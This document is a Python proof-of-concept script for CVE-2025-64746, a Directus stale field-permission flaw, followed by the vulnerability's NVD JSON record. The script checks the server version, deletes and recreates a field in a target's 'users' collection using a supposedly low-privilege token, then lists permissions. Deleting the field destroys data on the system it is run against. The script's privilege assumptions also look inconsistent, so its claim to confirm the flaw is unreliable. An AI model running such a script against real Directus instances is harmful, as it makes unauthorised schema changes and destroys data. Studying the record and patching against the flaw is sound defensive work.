CVE-2025-64746

# CVE-2025-64746 PoC - Directus Field Permission Stale Reference # This PoC demonstrates the permission inheritance vulnerability import requests import json TARGET_URL = "https://vulnerable-directus-instance.com" API_TOKEN = "your-low-privilege-token" TARGET_COLLECTION = "users" FIELD_NAME = "sensitive_field" def check_version(): """Check if Directus version is vulnerable (< 11.13.0)""" response = requests.get(f"{TARGET_URL}/server/info", headers={"Authorization": f"Bearer {API_TOKEN}"}) version = response.json().get("data", {}).get("version", "") major, minor, patch = map(int, version.split(".")[:3]) if major < 11 or (major == 11 and minor < 13): print(f"[+] Version {version} is vulnerable") return True return False def delete_field(field_name): """Step 1: Delete the target field""" response = requests.delete( f"{TARGET_URL}/fields/{TARGET_COLLECTION}/{field_name}", headers={"Authorization": f"Bearer {API_TOKEN}"} ) return response.status_code == 204 def create_field(field_name): """Step 2: Create new field with same name""" payload = { "field": field_name, "type": "string", "meta": {"special": "file"} } response = requests.post( f"{TARGET_URL}/fields/{TARGET_COLLECTION}", headers={"Authorization": f"Bearer {API_TOKEN}"}, json=payload ) return response.status_code in [200, 201] def check_permissions_inheritance(): """Step 3: Verify if new field inherited stale permissions""" response = requests.get( f"{TARGET_URL}/permissions", headers={"Authorization": f"Bearer {API_TOKEN}"} ) permissions = response.json().get("data", []) # Check if permissions exist for the field field_perms = [p for p in permissions if p.get("field") == FIELD_NAME and p.get("collection") == TARGET_COLLECTION] if field_perms: print(f"[+] Stale permissions found for field '{FIELD_NAME}'") print(f"[+] Permissions: {json.dumps(field_perms, indent=2)}") return True return False def main(): if not check_version(): print("[-] Version is not vulnerable") return print("[*] Step 1: Deleting field...") delete_field(FIELD_NAME) print("[*] Step 2: Creating field with same name...") create_field(FIELD_NAME) print("[*] Step 3: Checking permission inheritance...") if check_permissions_inheritance(): print("[+] Vulnerability confirmed: stale permissions inherited") else: print("[-] No permission inheritance detected") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-64746", "sourceIdentifier": "[email protected]", "published": "2025-11-13T21:15:54.407", "lastModified": "2025-12-08T14:58:27.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.13.0, Directus does not properly clean up field-level permissions when a field is deleted. When a field is removed from a collection, its reference in the permissions table remains intact. This stale reference creates a security gap: if another field is later created using the same name, it inherits the outdated permission entry. This behavior can unintentionally grant roles access to data they should not be able to read or modify. The issue is particularly risky in multi-tenant or production environments, where administrators may reuse field names, assuming old permissions have been fully cleared. Version 11.13.0 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-863"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.13.0", "matchCriteriaId": "19DDC40E-F676-4824-A433-37CFBEDFEBDB"}]}]}], "references": [{"url": "https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}